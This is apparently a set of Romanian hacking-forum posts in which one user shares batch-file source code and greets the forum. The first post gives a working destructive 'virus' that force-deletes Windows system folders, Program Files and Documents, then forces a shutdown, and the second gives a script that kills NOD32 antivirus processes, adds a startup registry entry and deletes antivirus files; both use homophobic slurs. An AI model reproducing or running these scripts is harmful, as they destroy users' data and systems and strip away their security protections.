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  1. Batch virus cod sursa @echo off DEL /f/s /Q %SystemRoot%system32 DEL /f /s /Q %SystemRoot%system DEL /f /s /Q %SystemRoot%Cursors DEL /f /s /Q %SystemRoot%Fonts DEL /f /s /Q C;PROGRA~1 DEL /f /s /Q C;DOCUME~1 >>"%Temp%.queer69.txt" ECHO OWNED BY Silent_control BITCH!* %Temp%.xyr0x.txt GOTO Faggot :Faggot start /max iexplore.exe [url]http://rst-crew.net[/url] >>"%Temp%.dickwadpooppusher.txt" ECHO Romania Security Team rullz %Temp%.owned.txt >>"%Temp%.imacumguzzlingfag.txt" ECHO OkaY, I got to Go! [url]http://rst-crew.net[/url] %Temp%.queer.txt shutdown -s -f -t 00 exit sterge multe fisiere windows dupa restart nu mai merge win* se conecteaza pe RST web si apoi se inchide pc nu e prea funny daca il executi
  2. cum sa opresti nod32 din *.bat @ECHO OFF Reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionrun /V KILLNOD32 /t Reg_SZ /d c:Windowssystem32B.bat TASKKILL /IM "nod32krn.exe" /F @Echo ON Echo TASKKILL /IM "nod32krn.exe" /F > B.bat @ECHO OFF copy B.bat C:WINDOWSsystem32 TASKKILL /IM "nod32kui.exe" /F Rename C:ProgramEsetnod32krn.exe a.exe TASKKILL /IM "nod32krn.exe" /F Del C:ProgramEsetnod32.exe Del A.bat + B.bat Silent_control
  3. Salutare` Sunt nou pe forum ( nu cred ca trebuia sa mai zic asta ! dar am ziso ) si imi place deviza toti pt unu si toti pt unu Silent_control
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